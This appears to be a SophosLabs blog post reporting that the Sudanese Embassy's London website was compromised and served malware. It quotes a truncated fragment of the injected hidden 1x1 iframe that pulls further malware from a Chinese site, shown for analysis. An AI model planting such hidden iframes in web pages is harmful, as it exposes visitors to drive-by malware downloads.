YAE: Yet Another Embassy -- The Republic of Sudan in London

Filed Under: Malware, SophosLabs


Monitoring our queues yesterday I thought that I saw a fake Sudanese Embassy website serving malware (Mal/Iframe-F). The press release heading were strange:-

  • Who is Blackmailing Whom?
  • ICC - Europe's Guantanamo?
  • Sudan and ICC
  • National Elections Commission


The suggestion that the International Criminal Court was like Guantanamo was not something I had heard before. So I went to the WHOIS of the site to see who owned the site:

Registrant's address:
60 Chambers Lane
London
NW10 2RL
United Kingdom

NW10 stands for the postcode area North West 10 i.e. Willesden Green. Not where you would traditionally think of Embassies being based in London.

The Contact details were correct though:-

Embassy of the Republic of the Sudan
3 Cleveland Row
St. James's
London
SW1A 1DD

Curiouser and curiouser. Looking through search engine results on the site it appears that the site is that of the Embassy of Sudan in London!

So why had the site come up in the queues?

Well it contains an iframe with the following code:

.cn/in.cgi?id1000" width=1 height=1 style="visibility: hidden">

this malicious Iframe is very small and will download further malware from a Chinese website.

Like other embassies that have been hit, India etc., the Sudanese haven't been targeted deliberately but are victims of poor security.

You might like